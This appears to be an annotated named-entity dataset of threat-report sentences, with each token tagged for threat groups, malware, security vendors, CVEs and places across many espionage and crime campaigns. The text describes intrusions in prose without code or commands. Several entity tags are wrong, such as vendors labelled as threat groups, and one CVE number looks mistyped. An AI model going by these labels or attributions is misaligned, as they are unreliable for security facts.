+Waterbug’s S-APT +use O +of O +Crambus B-MAL +infrastructure E-MAL +appears O +to O +have O +been O +a O +hostile O +takeover O +. 
O +One O +of O +the O +most O +interesting O +things O +to O +occur O +during O +one O +of O +Waterbug’s S-APT +recent O +campaigns O +was O +that O +during O +an O +attack O +against O +one O +target O +in O +the O +Middle B-LOC +East E-LOC +, O +Waterbug S-APT +appeared O +to O +hijack O +infrastructure O +from O +the O +Crambus O +espionage O +group O +and O +used O +it O +to O +deliver O +malware O +on O +to O +the O +victim’s O +network O +. O +These O +three O +recent O +Waterbug S-APT +campaigns O +have O +seen O +the O +group O +compromise B-IDTY +governments E-IDTY +and O +international B-IDTY +organizations E-IDTY +across O +the O +globe O +in O +addition O +to O +targets O +in O +the O +IT S-IDTY +and O +education B-IDTY +sectors E-IDTY +. O +Curiously O +though O +, O +Waterbug S-APT +also O +compromised O +other O +computers O +on O +the O +victim’s O +network O +using O +its O +own O +infrastructure S-IDTY +. O +Symantec S-SECTEAM +believes O +that O +the O +variant O +of O +Mimikatz S-MAL +used O +in O +this O +attack O +is O +unique O +to O +Waterbug S-APT +. O +Aside O +from O +the O +attack O +involving O +Crambus O +infrastructure O +, O +this O +sample O +of O +Mimikatz S-MAL +has O +only O +been O +seen O +used O +in O +one O +other O +attack O +, O +against O +an O +education S-IDTY +target O +in O +the O +UK S-LOC +in O +2017 S-TIME +. O +The O +first O +observed O +evidence O +of O +Waterbug S-APT +activity O +came O +on O +January B-TIME +11 E-TIME +, O +2018 S-TIME +, O +when O +a O +Waterbug-linked O +tool O +(a O +task O +scheduler O +named O +msfgi.exe S-FILE +) O +was O +dropped O +on O +to O +a O +computer O +on O +the O +victim’s O +network O +. 
O +In O +the O +case O +of O +the O +attack O +against O +the O +Middle B-LOC +Eastern E-LOC +target O +, O +Crambus S-APT +was O +the O +first O +group O +to O +compromise O +the O +victim’s O +network O +, O +with O +the O +earliest O +evidence O +of O +activity O +dating O +to O +November B-TIME +2017 E-TIME +. O +Waterbug’s S-APT +intrusions O +on O +the O +victim’s O +network O +continued O +for O +much O +of O +2018 S-TIME +. O +Symantec S-SECTEAM +did O +not O +observe O +the O +initial O +access O +point O +and O +the O +close O +timeframe O +between O +Waterbug S-APT +observed O +activity O +on O +the O +victim’s O +network O +and O +its O +observed O +use O +of O +Crambus O +infrastructure O +suggests O +that O +Waterbug S-APT +may O +have O +used O +the O +Crambus B-IDTY +infrastructure E-IDTY +as O +an O +initial O +access O +point O +. O + +It O +also O +reconfigures O +the O +Microsoft S-IDTY +Sysinternals O +registry O +to O +prevent O +pop-ups O +when O +running O +the O +PsExec B-MAL +tool E-MAL +. O +Waterbug S-APT +also O +used O +an O +older O +version O +of O +PowerShell S-MAL +, O +likely O +to O +avoid O +logging O +. O +In O +one O +of O +these O +campaigns O +, O +Waterbug S-APT +used O +a O +USB B-MAL +stealer E-MAL +that O +scans O +removable O +storage O +devices O +to O +identify O +and O +collect O +files O +of O +interest O +. O +The O +malware S-FILE +then O +uses O +WebDAV S-MAL +to O +upload O +the O +RAR B-FILE +archive E-FILE +to O +a O +Box O +account O +. 
O + +The O +DeepSight B-SECTEAM +Managed I-SECTEAM +Adversary E-SECTEAM +and O +Threat B-SECTEAM +Intelligence E-SECTEAM +team O +co-authored O +this O +blog O +and O +its O +customers O +have O +received O +intelligence O +with O +additional O +details O +about O +these O +campaigns O +, O +the O +characteristics O +of O +the O +Waterbug S-APT +( O +aka O +Turla S-APT +) O +Cyber B-ACT +Espionage E-ACT +group O +, O +and O +methods O +of O +detecting O +and O +thwarting O +activities O +of O +this O +adversary O +. O +The O +DeepSight B-SECTEAM +MATI I-SECTEAM +team E-SECTEAM +authored O +this O +blog O +and O +its O +customers O +have O +received O +intelligence O +with O +additional O +details O +about O +these O +campaigns S-ACT +, O +the O +characteristics O +of O +the O +Waterbug S-APT +Cyber B-ACT +Espionage E-ACT +group O +, O +and O +methods O +of O +detecting S-ACT +and O +thwarting B-ACT +activities E-ACT +of O +this O +adversary O +. O +While O +reviewing O +a O +2015 S-TIME +report⁵ O +of O +a O +Winnti S-APT +intrusion O +at O +a O +Vietnamese B-IDTY +gaming I-IDTY +company E-IDTY +, O +we O +identified O +a O +small O +cluster O +of O +Winnti⁶ S-APT +samples O +designed O +specifically O +for O +Linux⁷ O +. O +Following O +these O +reports O +, O +Chronicle S-SECTEAM +researchers O +doubled O +down O +on O +efforts O +to O +try O +to O +unravel O +the O +various O +campaigns O +where O +Winnti S-APT +was O +leveraged O +. O +Distinct O +changes O +to O +Azazel S-MAL +by O +the O +Winnti B-APT +developers E-APT +include O +the O +addition O +of O +a O +function O +named O +‘Decrypt2’ O +, O +which O +is O +used O +to O +decode O +an O +embedded O +configuration O +similar O +to O +the O +core O +implant O +. O +Zebrocy S-APT +activity O +initiates O +with O +spearphishing S-ACT +operations O +delivering O +various O +target O +profilers O +and O +downloaders O +without O +the O +use O +of O +any O +0day B-VULID +exploits S-VULNAME +. 
O +We O +will O +see O +more O +from O +Zebrocy S-APT +into O +2019 S-TIME +on O +government S-IDTY +and O +military S-IDTY +related O +organizations O +. O +The O +PowerShell B-MAL +script E-MAL +will O +look O +at O +the O +architecture O +of O +the O +system O +to O +check O +which O +malicious B-FILE +DLL I-FILE +files E-FILE +should O +be O +downloaded O +. O +In O +the O +same O +year O +, O +Silence S-APT +conducted O +DDoS B-ACT +attacks E-ACT +using O +the O +Perl B-MAL +IRC I-MAL +bot E-MAL +and O +public B-MAL +IRC E-MAL +chats O +to O +control O +Trojans O +. O +The O +FBI S-SECTEAM +issued O +a O +rare O +bulletin O +admitting O +that O +a O +group O +named O +APT6 S-APT +hacked O +into O +US B-IDTY +government E-IDTY +computer O +systems O +as O +far O +back O +as O +2011 S-TIME +and O +for O +years O +stole O +sensitive O +data O +. O +FireEye B-SECTEAM +iSIGHT E-SECTEAM +Intelligence O +believes O +that O +APT37 S-APT +is O +aligned O +with O +the O +activity O +publicly O +reported O +as O +Scarcruft S-APT +and O +Group123 S-APT +. O +Trend B-SECTEAM +Micro E-SECTEAM +attributes O +this O +activity O +to O +MuddyWater S-APT +, O +an O +Iran-nexus O +actor S-APT +that O +has O +been O +active O +since O +at O +least O +May B-TIME +2017 E-TIME +. O +FireEye S-SECTEAM +assess O +that O +the O +actors S-APT +employing O +this O +latest O +Flash S-TOOL +zero-day S-ACT +are O +a O +suspected O +North B-LOC +Korean E-LOC +group O +we O +track O +as O +TEMP.Reaper S-APT +. O +FireEye S-SECTEAM +has O +observed O +other O +suspected O +North B-LOC +Korean E-LOC +threat O +groups O +such O +as O +TEMP.Hermit S-APT +employ O +wiper O +malware O +in O +disruptive O +attacks O +. 
O +On O +Nov14 S-TIME +, O +2017 S-TIME +, O +FireEye S-SECTEAM +observed O +APT34 S-APT +using O +an O +exploit S-VULNAME +for O +the O +Microsoft S-IDTY +Office O +vulnerability S-VULNAME +to O +target O +a O +government B-IDTY +organization E-IDTY +in O +the O +Middle B-LOC +East E-LOC +. O +Kaspersky S-SECTEAM +reveals O +that O +APT33 S-APT +is O +a O +capable O +group O +that O +has O +carried O +out O +Cyber B-ACT +Espionage E-ACT +operations O +since O +at O +least O +2013 S-TIME +. O +APT33 S-APT +is O +the O +only O +group O +that O +Kaspersky S-SECTEAM +has O +observed O +use O +the O +DROPSHOT B-MAL +dropper E-MAL +. O +The O +Cyber B-ACT +Espionage E-ACT +group O +APT32 S-APT +heavily O +obfuscates O +their O +backdoors S-MAL +and O +scripts S-MAL +, O +and O +Mandiant O +consultants O +observed O +APT32 S-APT +implement O +additional O +command O +argument O +obfuscation O +in O +April S-TIME +2017 S-TIME +. O +In O +all O +Mandiant S-SECTEAM +investigations O +to O +date O +where O +the O +CARBANAK O +backdoor O +has O +been O +discovered O +, O +the O +activity O +has O +been O +attributed O +to O +the O +FIN7 S-APT +threat O +group O +. O +Kaspersky S-SECTEAM +released O +a O +similar O +report O +about O +the O +same O +group O +under O +the O +name O +Carbanak S-APT +in O +February B-TIME +2015 E-TIME +. O +FireEye S-SECTEAM +assesses O +that O +APT32 O +leverages O +a O +unique O +suite O +of O +fully-featured O +malware O +. O +FireEye S-SECTEAM +has O +observed O +APT32 S-APT +targeting O +foreign O +corporations O +with O +a O +vested O +interest O +in O +Vietnam’s B-IDTY +manufacturing E-IDTY +, O +consumer B-IDTY +products E-IDTY +, O +and O +hospitality S-IDTY +sectors O +. O +The O +FireEye S-SECTEAM +iSIGHT S-SECTEAM +Intelligence O +MySIGHT O +Portal O +contains O +additional O +information O +on O +these O +backdoor O +families O +based O +on O +Mandiant S-SECTEAM +investigations O +of O +APT32 S-APT +intrusions O +. 
O +FireEye S-SECTEAM +assesses O +that O +APT32 S-APT +is O +a O +Cyber B-ACT +Espionage E-ACT +group O +aligned O +with O +Vietnamese S-IDTY +government S-IDTY +interests O +. O +In O +May S-TIME +and O +June B-TIME +2017 E-TIME +, O +FireEye S-SECTEAM +has O +associated O +this O +campaign O +with O +APT19 S-APT +, O +a O +group O +that O +we O +assess O +is O +composed O +of O +freelancers O +, O +with O +some O +degree O +of O +sponsorship O +by O +the O +Chinese B-IDTY +government E-IDTY +. O +APT10 S-APT +is O +a O +Chinese O +Cyber B-ACT +Espionage E-ACT +group O +that O +FireEye S-APT +has O +tracked O +since O +2009 S-TIME +. O +In O +addition O +to O +the O +spear B-ACT +phishes E-ACT +, O +FireEye B-SECTEAM +ISIGHT I-SECTEAM +Intelligence E-SECTEAM +has O +observed O +APT10 S-APT +accessing O +victims O +through O +global O +service O +providers O +. O +FireEye’s S-SECTEAM +visibility O +into O +the O +operations O +of O +APT28 S-APT +– O +a O +group O +we O +believe O +the O +Russian B-IDTY +government E-IDTY +sponsors O +– O +has O +given O +us O +insight O +into O +some O +of O +the O +government’s O +targets O +, O +as O +well O +as O +its O +objectives O +and O +the O +activities O +designed O +to O +further O +them O +. O +FireEye S-SECTEAM +has O +tracked O +and O +profiled O +APT28 S-APT +group O +through O +multiple O +investigations O +, O +endpoint O +and O +network O +detections O +, O +and O +continuous O +monitoring O +. O +In O +April B-TIME +2015 E-TIME +, O +FireEye S-SECTEAM +uncovered O +the O +malicious O +efforts O +of O +APT30 S-APT +, O +a O +suspected O +China-based S-LOC +threat O +group O +. O +FireEye B-SECTEAM +iSIGHT E-SECTEAM +Intelligence O +has O +been O +tracking S-ACT +a O +pair O +of O +cybercriminals O +that O +we O +refer O +to O +as O +the O +Vendetta B-APT +Brothers E-APT +. 
O +Google S-SECTEAM +and O +Microsoft S-SECTEAM +have O +already O +confirmed O +the O +Russian O +hacker O +group O +APT28 S-APT +used O +a O +Flash S-TOOL +vulnerability O +CVE-2016-7855 S-VULID +along O +with O +this O +kernel O +privilege O +escalation O +flaw O +to O +perform O +a O +targeted O +attack O +. O + +McAfee S-SECTEAM +concludes O +that O +some O +groups—and O +especially O +the O +Poetry O +Group S-APT +—have O +shifted O +tactics O +to O +use O +Citadel O +in O +ACTs O +other O +than O +what O +it O +was O +originally O +intended O +for O +. O +McAfee S-SECTEAM +Advanced O +Threat O +research O +determines O +with O +confidence O +that O +Lazarus S-APT +is O +the O +threat O +group O +behind O +this O +attack O +for O +the O +following O +reasons:Contacts O +an O +IP S-PROT +address O +/ O +domain O +that O +was O +used O +to O +host O +a O +malicious B-FILE +document E-FILE +from O +a O +Lazarus S-APT +previous O +campaign O +in O +2017 S-TIME +. O +In O +November B-TIME +2017 E-TIME +, O +Talos S-SECTEAM +observed O +the O +Group123 S-APT +, O +which O +included O +a O +new O +version O +of O +ROKRAT O +being O +used O +in O +the O +latest O +wave O +of O +attacks O +. O +In O +addition O +to O +TALOS S-SECTEAM +investigation O +on O +KONNI S-MAL +, O +on O +July B-TIME +18 I-TIME +2017 E-TIME +, O +BitDefender O +released O +a O +whitepaper O +on O +DarkHotel S-APT +. O +According O +to O +security O +360 B-SECTEAM +Threat I-SECTEAM +Intelligence I-SECTEAM +Center E-SECTEAM +, O +Goldmouse O +was O +observed O +deploying O +the O +nebulous O +njRAT B-FILE +backdoor E-FILE +. O +ESET S-SECTEAM +has O +also O +reported O +PowerShell B-MAL +scripts E-MAL +being O +used O +by O +Turla S-APT +to O +provide O +direct O +, O +in-memory O +loading O +and O +execution O +of O +malware O +. O +Additionally O +Kaspersky S-SECTEAM +identified O +a O +new O +backdoor S-FILE +that O +we O +attribute O +with O +medium O +confidence O +to O +Turla S-APT +. 
O +Researchers O +at O +Symantec S-SECTEAM +suspect O +that O +Turla S-APT +used O +the O +hijacked O +network O +to O +attack O +a O +Middle B-LOC +Eastern E-LOC +government S-IDTY +. O +Symantec S-SECTEAM +researchers O +have O +uncovered O +evidence O +that O +the O +Waterbug S-APT +APT O +group O +has O +conducted O +a O +hostile O +takeover O +of O +an O +attack O +platform O +. O +Researchers O +at O +the O +Microstep B-SECTEAM +Intelligence I-SECTEAM +Bureau E-SECTEAM +have O +published O +a O +report O +on O +targeted O +attacks O +on O +the O +Ukrainian B-IDTY +government E-IDTY +that O +they O +attribute O +to O +the O +Gamaredon S-APT +threat O +actor O +. O +Kaspersky S-SECTEAM +found O +an O +active B-ACT +campaign E-ACT +by O +a O +Chinese S-LOC +APT O +group O +we O +call O +SixLittleMonkeys S-APT +that O +uses O +a O +new O +version O +of O +the O +Microcin B-MAL +Trojan E-MAL +and O +a O +RAT S-MAL +that O +we O +call O +HawkEye O +as O +a O +last O +stager O +. O +Trend B-SECTEAM +Micro E-SECTEAM +has O +previously O +reported O +the O +use O +of O +this O +malware O +in O +targeted O +attacks O +by O +the O +BlackTech S-APT +group O +, O +primarily O +focused O +on O +cyber-espionage O +in O +Asia S-LOC +. O +LuckyMouse S-APT +activity O +detected O +by O +Palo B-SECTEAM +Alto E-SECTEAM +involved O +the O +attackers O +installing O +web B-MAL +shells E-MAL +on O +SharePoint O +servers O +to O +compromise O +government B-IDTY +organizations E-IDTY +in O +the O +Middle S-LOC +East S-LOC +. O +Talos S-SECTEAM +published O +its O +analysis O +of O +the O +BlackWater B-ACT +campaign E-ACT +, O +related O +to O +MuddyWater S-APT +group O +. O +Trend B-SECTEAM +Micro E-SECTEAM +also O +reported O +MuddyWater’s S-APT +use O +of O +a O +new O +multi-stage O +PowerShell-based O +backdoor O +called O +POWERSTATS B-FILE +v3 E-FILE +. 
O +Regarding O +other O +groups S-APT +, O +Kaspersky S-SECTEAM +discovered O +new O +activity O +related O +to O +ZooPark S-APT +, O +a O +cyber-espionage O +threat O +actor O +that O +has O +focused O +mainly O +on O +stealing B-ACT +data E-ACT +from O +Android S-OS +devices O +. O +Recorded B-SECTEAM +Future E-SECTEAM +published O +an O +analysis O +of O +the O +infrastructure O +built O +by O +APT33 S-APT +( O +aka O +Elfin S-APT +) O +to O +target O +Saudi S-LOC +organizations O +. O + +Early O +in O +Q2 O +, O +Kaspersky S-SECTEAM +identified O +an O +interesting O +Lazarus S-APT +attack O +targeting O +a O +mobile B-IDTY +gaming E-IDTY +company O +in O +South B-LOC +Korea E-LOC +that O +we O +believe O +was O +aimed O +at O +stealing O +application O +source O +code O +. O +In O +a O +recent O +campaign O +, O +Kaspersky S-SECTEAM +observed O +ScarCruft S-APT +using O +a O +multi-stage O +binary O +to O +infect O +several O +victims O +and O +ultimately O +install O +a O +final O +payload O +known O +as O +ROKRAT S-MAL +– O +a O +cloud O +service-based O +backdoor O +. O +ESET S-SECTEAM +recently O +analyzed O +a O +new O +Mac O +OS O +sample S-FILE +from O +the O +OceanLotus S-APT +group O +that O +had O +been O +uploaded B-ACT +to I-ACT +VirusTotal E-ACT +. O +The O +threat O +actor S-APT +behind O +the O +campaign O +, O +which O +Kaspersky S-SECTEAM +believes O +to O +be O +the O +PLATINUM S-SECTEAM +APT O +group O +, O +uses O +an O +elaborate O +, O +previously O +unseen O +, O +steganographic O +technique O +to O +conceal O +communication O +. O +FireEye S-SECTEAM +defined O +APT40 S-SECTEAM +as O +the O +Chinese S-LOC +state-sponsored O +threat O +actor O +previously O +reported O +as O +TEMP.Periscope S-APT +, O +Leviathan S-APT +and O +TEMP.Jumper S-APT +. 
O +In O +January S-TIME +, O +Kaspersky S-SECTEAM +identified O +new O +activity O +by O +the O +Transparent O +Tribe O +APT O +group O +aka O +PROJECTM S-APT +and O +MYTHIC B-APT +LEOPARD E-APT +, O +a O +threat O +actor O +with O +interests O +aligned O +with O +Pakistan O +that O +has O +shown O +a O +persistent O +focus O +on O +Indian S-LOC +military S-IDTY +targets O +. O +OceanLotus S-APT +was O +another O +actor O +active O +during O +this O +period O +, O +using O +a O +new O +downloader O +called O +KerrDown S-MAL +, O +as O +reported O +by O +Palo B-SECTEAM +Alto E-SECTEAM +. O +ESET S-SECTEAM +recently O +uncovered O +a O +new O +addition O +to O +OceanLotus’s S-APT +toolset O +targeting O +Mac O +OS O +. O +In O +mid-2018 S-TIME +, O +Kaspersky's S-SECTEAM +report O +on O +Operation O +AppleJeus” O +highlighted O +the O +focus O +of O +the O +Lazarus S-APT +threat O +actor O +on O +cryptocurrency O +exchanges O +. O +Kaspersky S-SECTEAM +also O +observed O +some O +activity O +from O +Gaza O +Team O +and O +MuddyWater S-APT +. O +Kaspersky S-SECTEAM +wrote O +about O +LuckyMouse S-SECTEAM +targeting O +national O +data O +centers O +in O +June S-TIME +. O +Kaspersky S-SECTEAM +also O +discovered O +that O +LuckyMouse S-SECTEAM +unleashed O +a O +new O +wave O +of O +activity O +targeting O +Asian S-LOC +governmental O +organizations O +just O +around O +the O +time O +they O +had O +gathered O +for O +a O +summit O +in O +China S-LOC +. O +Kaspersky S-SECTEAM +have O +observed O +similar O +activity O +in O +the O +past O +from O +groups O +such O +as O +Oilrig S-APT +and O +Stonedrill S-APT +, O +which O +leads O +us O +to O +believe O +the O +new O +attacks O +could O +be O +connected O +, O +though O +for O +now O +that O +connection O +is O +only O +assessed O +as O +low O +confidence O +. 
O +In O +August B-TIME +2019 E-TIME +, O +FireEye S-SECTEAM +released O +the O +Double O +Dragon” O +report O +on O +our O +newest O +graduated O +threat O +group O +, O +APT41 S-APT +. O +Today O +, O +FireEye S-SECTEAM +Intelligence O +is O +releasing O +a O +comprehensive O +report O +detailing O +APT41 S-APT +, O +a O +prolific O +Chinese S-LOC +cyber O +threat O +group O +that O +carries O +out O +state-sponsored O +espionage O +activity O +in O +parallel O +with O +financially S-IDTY +motivated O +operations O +. O +Group-IB S-SECTEAM +experts O +continuously O +monitor O +the O +Silence’ S-APT +activities O +. O +Group-IB S-SECTEAM +has O +uncovered O +a O +hacker O +group O +, O +MoneyTaker S-APT +, O +attacking O +banks S-IDTY +in O +the O +USA S-LOC +and O +Russia S-LOC +. O +Group-IB S-SECTEAM +reveals O +the O +unknown O +details O +of O +attacks O +from O +one O +of O +the O +most O +notorious O +APT O +groups O +, O +Lazarus S-APT +. O +Finally O +, O +Kaspersky S-SECTEAM +produced O +a O +summary O +report O +on O +Sofacy’s S-APT +summertime O +activity O +. O +Kaspersky S-SECTEAM +were O +also O +able O +to O +produce O +two O +reports O +on O +Korean S-LOC +speaking O +actors O +, O +specifically O +involving O +Scarcruft S-APT +and O +Bluenoroff S-APT +. O +Analysis O +of O +the O +payload O +allowed O +us O +to O +confidently O +link O +this O +attack O +to O +an O +actor O +Kaspersky S-SECTEAM +track O +as O +BlackOasis S-APT +. O +Kaspersky S-SECTEAM +first O +became O +aware O +of O +BlackOasis’ S-APT +activities O +in O +May B-TIME +2016 E-TIME +, O +while O +investigating O +another O +Adobe O +Flash S-TOOL +zero B-VULNAME +day E-VULNAME +. O + +It O +contains O +a O +Word S-TOOL +document O +in O +plaintext O +( O +written O +to O +Bienvenue_a_Sahaja_Yoga_Toulouse.doc S-FILE +) O +, O +along O +with O +an O +executable O +( O +Update.exe S-FILE +) O +and O +DLL S-TOOL +( O +McUpdate.dll S-FILE +) O +. 
O + +We O +identified O +decoy B-FILE +files E-FILE +which O +indicate O +these O +attacks O +began O +with O +spear B-ACT +phishing I-ACT +messages E-ACT +but O +have O +not O +observed O +the O +actual O +messages O +. O + +Additionally O +, O +these O +decoy B-FILE +documents E-FILE +are O +hosted O +on O +legitimate O +websites O +including O +a O +government O +website O +belonging O +to O +the O +Cambodia B-IDTY +Government E-IDTY +and O +in O +at O +least O +once O +case O +, O +Facebook S-IDTY +. O + +However O +, O +the O +unique O +malware O +variant O +, O +BlackEnergy B-FILE +3 E-FILE +, O +reemerged O +in O +Ukraine S-LOC +early O +in O +2015 S-TIME +, O +where O +we O +had O +first O +found O +Sandworm B-APT +Team E-APT +. O + +The O +initial O +indicator O +of O +the O +attack O +was O +a O +malicious O +Web B-TOOL +shell E-TOOL +that O +was O +detected O +on O +an O +IIS S-TOOL +server O +, O +coming O +out O +of O +the O +w3wp.exe S-FILE +process O +. O + +We O +have O +previously O +detected O +groups S-APT +we O +suspect O +are O +affiliated O +with O +the O +North B-LOC +Korean E-LOC +government S-IDTY +compromising O +electric S-IDTY +utilities O +in O +South B-LOC +Korea E-LOC +, O +but O +these O +compromises O +did O +not O +lead O +to O +a O +disruption O +of O +the O +power O +supply O +. O +Instead O +, O +sensitive O +KHNP B-FILE +documents E-FILE +were O +leaked O +by O +the O +actors S-APT +as O +part O +of O +an O +effort O +to O +exaggerate O +the O +access O +they O +had O +and O +embarrass O +the O +South B-IDTY +Korean I-IDTY +Government E-IDTY +, O +a O +technique O +we O +assess O +North B-LOC +Korea E-LOC +would O +turn O +to O +again O +in O +order O +to O +instill O +fear O +and/or O +meet O +domestic O +propaganda O +aims O +. O +North B-LOC +Korea E-LOC +linked O +hackers O +are O +among O +the O +most O +prolific O +nation-state O +threats O +, O +targeting O +not O +only O +the B-LOC +U.S. 
E-LOC +and O +South B-LOC +Korea E-LOC +but O +the O +global O +financial S-IDTY +system O +and O +nations S-IDTY +worldwide O +. O + +The O +malware S-MAL +may O +inject B-ACT +itself E-ACT +into O +browser O +processes O +and O +explorer.exe S-FILE +. O + +In O +the O +last B-TIME +few I-TIME +weeks E-TIME +, O +FormBook S-FILE +was O +seen O +downloading O +other O +malware O +families O +such O +as O +NanoCore S-FILE +. O + +The O +vulnerability O +is O +bypassing O +most O +mitigations; O +however O +, O +as O +noted O +above O +, O +FireEye S-SECTEAM +email S-TOOL +and O +network O +products O +detect O +the O +malicious B-FILE +documents E-FILE +. O + +Through O +the O +exploitation O +of O +the O +HTA O +handler O +vulnerability O +described O +in O +CVE-2017-1099 S-VULID +, O +the O +observed O +RTF S-TOOL +attachments O +download O +. O + +In O +early O +May S-TIME +, O +the O +phishing B-ACT +lures E-ACT +leveraged O +RTF S-TOOL +attachments O +that O +exploited O +the O +Microsoft S-IDTY +Windows S-OS +vulnerability O +described O +in O +CVE-2017-0199 S-VULID +. O + +In O +their O +current O +campaign O +, O +APT32 S-APT +has O +leveraged O +ActiveMime B-FILE +files E-FILE +that O +employ O +social B-ACT +engineering E-ACT +methods O +to O +entice O +the O +victim O +into O +enabling O +macros O +. O + +APT32 S-APT +actors O +continue O +to O +deliver O +the O +malicious B-FILE +attachments E-FILE +via O +spear-phishing S-ACT +emails S-TOOL +. O + +Most O +of O +these O +data-stealing O +capabilities O +were O +present O +in O +the O +oldest O +variants O +of O +CARBANAK S-FILE +that O +we O +have O +seen O +and O +some O +were O +added O +over O +time O +. 
O + +February S-TIME +saw O +three O +particularly O +interesting O +publications O +on O +the O +topic O +of O +macOS O +malware: O +a O +Trojan S-MAL +Cocoa O +application O +that O +sends O +system O +information O +including O +keychain O +data O +back O +to O +the O +attacker S-APT +, O +a O +macOS O +version O +of O +APT28’s S-APT +Xagent O +malware O +, O +and O +a O +new O +Trojan B-FILE +ransomware E-FILE +. O + +As O +early O +as O +March B-TIME +4 E-TIME +, O +2017 S-TIME +, O +malicious B-FILE +documents E-FILE +exploiting O +CVE-2017-0199 S-VULID +were O +used O +to O +deliver O +the O +LATENTBOT S-MAL +malware S-MAL +. O + +The O +first O +, O +st07383.en17.docx S-FILE +, O +continues O +by O +utilizing O +32 O +or O +64 O +bit O +versions O +of O +CVE-2017-0001 S-VULID +to O +escalate O +privileges O +before O +executing O +a O +final O +JavaScript O +payload O +containing O +a O +malware O +implant O +known O +as O +SHIRIME S-FILE +. O + +This O +vulnerability O +was O +found O +in O +a O +document O +named O +Trump's_Attack_on_Syria_English.docx S-FILE +. O + +To O +install O +and O +register O +the O +malicious O +shim O +database O +on O +a O +system O +, O +FIN7 S-APT +used O +a O +custom O +Base64 O +encoded O +PowerShell B-MAL +script E-MAL +, O +which O +ran O +the O +sdbinst.exe” S-FILE +utility O +to O +register O +a O +custom O +shim O +database O +file O +containing O +a O +patch O +onto O +a O +system O +. O + +During O +the O +investigations O +, O +Mandiant S-SECTEAM +observed O +that O +FIN7 S-APT +used O +a O +custom O +shim O +database O +to O +patch O +both O +the O +32-bit O +and O +64-bit O +versions O +of O +services.exe” S-FILE +with O +their O +CARBANAK S-MAL +payload O +. 
O + +We O +have O +not O +yet O +identified O +FIN7’s S-APT +ultimate O +goal O +in O +this O +campaign O +, O +as O +we O +have O +either O +blocked O +the O +delivery O +of O +the O +malicious B-FILE +emails E-FILE +or O +our O +FaaS O +team O +detected O +and O +contained O +the O +attack O +early O +enough O +in O +the O +lifecycle O +before O +we O +observed O +any O +data O +targeting O +or O +theft O +. O + +Figure O +1 O +shows O +a O +sample O +phishing B-FILE +email E-FILE +used O +by O +HawkEye B-ACT +operators E-ACT +in O +this O +latest O +campaign O +. O + +Many O +groups O +leverage O +the O +regsvr32.exe S-FILE +application O +whitelisting O +bypass O +, O +including O +APT19 S-APT +in O +their O +2017 S-TIME +campaign O +against O +law B-IDTY +firms E-IDTY +. O + +The O +malware S-FILE +was O +initially O +distributed O +through O +a O +compromised O +software O +update O +system O +and O +then O +self-propagated O +through O +stolen B-ACT +credentials E-ACT +and O +SMB B-ACT +exploits E-ACT +, O +including O +the O +EternalBlue B-MAL +exploit E-MAL +used O +in O +the O +WannaCry S-APT +attack O +from O +May B-TIME +2017 E-TIME +. O + +The O +malware S-FILE +appends O +encrypted O +data O +files O +with O +the O +.WCRY B-FILE +extension E-FILE +, O +drops O +and O +executes O +a O +decryptor O +tool O +, O +and O +demands O +$300 O +or O +$600 O +USD O +to O +decrypt O +the O +data O +. O + +The O +malware S-FILE +then O +builds O +two O +DLLs S-FILE +in O +memory O +– O +they O +are O +32 O +and O +64-bit O +DLLs O +that O +have O +identical O +functionality O +. O + +The O +malware S-FILE +continues O +by O +creating O +a O +service O +named O +mssecsvc2.0 S-FILE +with O +a O +binary O +path O +pointing O +to O +the O +running O +module O +with O +the O +arguments O +-m O +security O +. O + +The O +malware S-FILE +then O +writes O +the O +R O +resource O +data O +to O +the O +file S-FILE +C:\WINDOWS\tasksche.exe S-FILE +. 
O + +The O +usefulness O +of O +flare-qdb S-FILE +can O +be O +seen O +in O +cases O +such O +as O +loops O +dealing O +with O +strings O +. O + +The O +usefulness O +of O +flare-qdb S-FILE +can O +be O +seen O +in O +cases O +such O +as O +loops O +dealing O +with O +strings O +. O + +The O +usefulness O +of O +flare-qdb S-FILE +can O +be O +seen O +in O +cases O +such O +as O +loops O +dealing O +with O +strings O +. O + +Attaching O +with O +IDA B-FILE +Pro E-FILE +via O +WinDbg S-FILE +as O +in O +Figure O +11 O +shows O +that O +the O +program O +counter O +points O +to O +the O +infinite O +loop O +written O +in O +memory O +allocated O +by O +flare-qdb O +. O + +We O +have O +also O +observed O +them S-FILE +using O +virtual O +private O +network O +services O +that O +use O +IPs O +based O +in O +numerous O +countries O +to O +ensure O +anonymity O +and O +obfuscate O +criminal O +operations O +. O + +Once O +downloaded O +and O +executed O +, O +it O +drops O +an O +intermediate O +payload O +that O +further O +downloads O +a O +Pony B-FILE +DLL E-FILE +and O +Vawtrak S-FILE +executable O +, O +which O +perform O +data O +theft O +and O +connect O +to O +a O +command O +and O +control O +( O +C2 S-TOOL +) O +server O +. O + +The O +attachment O +in O +these O +emails S-TOOL +is O +a O +weaponized O +Microsoft B-ACT +Office I-ACT +document E-ACT +containing O +a O +malicious O +macro O +that O +– O +when O +enabled O +– O +leads O +to O +the O +download O +of O +Hancitor S-FILE +. O + +After O +the O +executable O +is O +executed O +, O +it O +downloads O +Pony S-FILE +and O +Vawtrak S-FILE +malware O +variants O +to O +steal O +data O +. O + +Upon O +execution O +, O +it O +will O +communicate O +with O +an O +attacker-controller O +website O +to O +download O +a O +variant O +of O +the O +Pony B-FILE +malware E-FILE +, O +pm.dll” S-FILE +along O +with O +a O +standard O +Vawtrak O +Trojan S-MAL +. 
O + +In O +this O +blog O +, O +FireEye S-SECTEAM +Labs O +dissects O +this O +new O +ATM S-TOOL +malware S-MAL +that O +we O +have O +dubbed O +RIPPER S-MAL +and O +documents O +indicators O +that O +strongly O +suggest O +this O +piece O +of O +malware O +is O +the O +one O +used O +to O +steal O +from O +the O +ATMs O +at O +banks S-IDTY +in O +Thailand S-LOC +. O + +RIPPER S-MAL +interacts O +with O +the O +ATM O +by O +inserting O +a O +specially O +manufactured O +ATM O +card O +with O +an O +EMV O +chip O +that O +serves O +as O +the O +authentication O +mechanism O +. O + +RIPPER S-MAL +will O +examine O +the O +contents O +of O +directories O +associated O +with O +the O +targeted O +ATM B-IDTY +vendors E-IDTY +and O +will O +replace O +legitimate O +executables O +with O +itself O +. O + +This O +malware S-FILE +family O +can O +be O +used O +to O +compromise O +multiple O +vendor O +platforms O +and O +leverages O +uncommon O +technology O +to O +access O +physical O +devices O +. O + +From O +our O +trend O +analysis O +seen O +in O +Figure O +3 O +, O +Locky S-FILE +ransomware O +started O +being O +delivered O +via O +DOCM O +format O +email S-TOOL +attachments O +more O +extensively O +beginning O +in O +August S-TIME +. O + +Discovered O +for O +the O +first O +time O +in O +Mexico S-LOC +back O +in O +2013 S-TIME +, O +Ploutus S-FILE 